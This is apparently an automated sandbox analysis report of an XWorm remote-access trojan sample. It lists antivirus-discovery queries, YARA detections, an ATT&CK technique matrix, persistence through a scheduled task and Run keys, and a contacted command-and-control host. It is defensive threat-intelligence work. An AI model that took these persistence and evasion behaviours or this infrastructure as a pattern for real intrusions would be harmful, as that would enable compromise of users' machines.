                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Users\user\XClient.exe VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Users\user\XClient.exe VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Users\user\XClient.exe VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Users\user\XClient.exe VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Users\user\XClient.exe VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Users\user\XClient.exe VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Users\user\XClient.exe VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: RegSvcs.exe, 00000001.00000002.4467548579.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4467548579.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4485586906.0000000005B92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6cf8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2876fb0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6128.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a651c.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 80c619d931fa4e5c89fe87aac0b6b143.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4956, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6cf8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2876fb0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6128.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a651c.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 80c619d931fa4e5c89fe87aac0b6b143.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4956, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		311
                Process Injection                		111
                Masquerading                		OS Credential Dumping431
                Security Software Discovery                		Remote Services11
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		21
                Registry Run Keys / Startup Folder                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		1
                DLL Side-Loading                		21
                Registry Run Keys / Startup Folder                		141
                Virtualization/Sandbox Evasion                		Security Account Manager141
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		311
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging12
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Obfuscated Files or Information                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Software Packing                		DCSync13
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1508104 Sample: 80c619d931fa4e5c89fe87aac0b... Startdate: 09/09/2024 Architecture: WINDOWS Score: 100 59 ip-api.com 2->59 61 case-shield.gl.at.ply.gg 2->61 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 15 other signatures 2->73 9 80c619d931fa4e5c89fe87aac0b6b143.exe 1 2->9         started        13 XClient.exe 2->13         started        15 XClient.exe 2->15         started        17 5 other processes 2->17 signatures3 process4 file5 57 80c619d931fa4e5c89fe87aac0b6b143.exe.log, CSV 9->57 dropped 85 Detected unpacking (changes PE section rights) 9->85 87 Detected unpacking (overwrites its own PE header) 9->87 89 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->89 91 3 other signatures 9->91 19 RegSvcs.exe 16 6 9->19         started        24 conhost.exe 13->24         started        26 conhost.exe 15->26         started        28 conhost.exe 17->28         started        30 conhost.exe 17->30         started        32 conhost.exe 17->32         started        34 2 other processes 17->34 signatures6 process7 dnsIp8 63 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 19->63 65 case-shield.gl.at.ply.gg 147.185.221.17, 26501, 49713, 49714 SALSGIVERUS United States 19->65 55 C:\Users\user\XClient.exe, PE32 19->55 dropped 77 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->77 79 Protects its processes via BreakOnTermination flag 19->79 81 Bypasses PowerShell execution policy 19->81 83 4 other signatures 19->83 36 powershell.exe 23 19->36         started        39 powershell.exe 22 19->39         started        41 powershell.exe 23 19->41         started        43 2 other processes 19->43 file9 signatures10 process11 signatures12 75 Loading BitLocker PowerShell Module 36->75 45 conhost.exe 36->45         started        47 conhost.exe 39->47         started        49 conhost.exe 41->49         started        51 conhost.exe 43->51         started        53 conhost.exe 43->53         started        process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                80c619d931fa4e5c89fe87aac0b6b143.exe34%ReversingLabsWin32.Trojan.Generic
                80c619d931fa4e5c89fe87aac0b6b143.exe100%AviraTR/Dropper.Gen2
                80c619d931fa4e5c89fe87aac0b6b143.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\XClient.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://crl.micro0%Avira URL Cloudsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
                http://crl.miF0%Avira URL Cloudsafe
                http://schemas.xmlsoap.org/soap/encoding/0%Avira URL Cloudsafe
                http://crl.microsoft0%Avira URL Cloudsafe
                http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe
                case-shield.gl.at.ply.gg0%Avira URL Cloudsafe
                http://www.microsoft.co0%Avira URL Cloudsafe
                https://aka.ms/pscore6lBjq0%Avira URL Cloudsafe
                http://goo.gl/YroZm&quot;0%Avira URL Cloudsafe
                http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                http://www.microsoft.C0%Avira URL Cloudsafe
                http://www.microsoft.0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                case-shield.gl.at.ply.gg
                		147.185.221.17
                		truetrue
                  		unknown
                  ip-api.com
                  		208.95.112.1
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    case-shield.gl.at.ply.ggtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://ip-api.com/line/?fields=hostingfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2072568352.0000000005407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2110032456.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2153433564.0000000005FF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.micropowershell.exe, 00000006.00000002.2114526421.00000000076EA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2068390929.00000000044F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2099477887.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2138061383.00000000050E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.microsoftpowershell.exe, 00000006.00000002.2114526421.00000000076EA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.miFpowershell.exe, 00000006.00000002.2114526421.00000000076C6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2068390929.00000000044F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2099477887.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2138061383.00000000050E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2072568352.0000000005407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2110032456.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2153433564.0000000005FF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.microsoft.copowershell.exe, 0000000A.00000002.2219548874.0000000007736000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/pscore6lBjqpowershell.exe, 00000003.00000002.2068390929.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2099477887.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2138061383.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2189406554.0000000004C81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://goo.gl/YroZm&quot;80c619d931fa4e5c89fe87aac0b6b143.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.microsoft.powershell.exe, 00000006.00000002.2117008604.0000000008672000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.microsoft.Cpowershell.exe, 00000006.00000002.2114526421.00000000076EA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2068390929.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2099477887.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2138061383.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2189406554.0000000004C81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    208.95.112.1
                    		ip-api.comUnited States
                    		53334TUT-ASUStrue
                    147.185.221.17
                    		case-shield.gl.at.ply.ggUnited States
                    		12087SALSGIVERUStrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1508104
                    Start date and time:2024-09-09 17:27:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 32s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:30
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:80c619d931fa4e5c89fe87aac0b6b143.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@31/29@2/2
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 391
                    • Number of non-executed functions: 46
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target XClient.exe, PID 1576 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 5544 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 5608 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 5912 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 6160 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 6424 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2164 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 5036 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6668 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • VT rate limit hit for: 80c619d931fa4e5c89fe87aac0b6b143.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    11:28:00API Interceptor41x Sleep call for process: powershell.exe modified
                    11:28:18API Interceptor9746114x Sleep call for process: RegSvcs.exe modified
                    17:28:19Task SchedulerRun new task: XClient path: C:\Users\user\XClient.exe
                    17:28:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\XClient.exe
                    17:28:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\XClient.exe
                    17:28:37AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    208.95.112.1Ubk6gnUESo.exeGet hashmaliciousXWormBrowse
                    • ip-api.com/line/?fields=hosting
                    4RXDcatXyT.exeGet hashmaliciousAsyncRAT, XWormBrowse
                    • ip-api.com/line/?fields=hosting
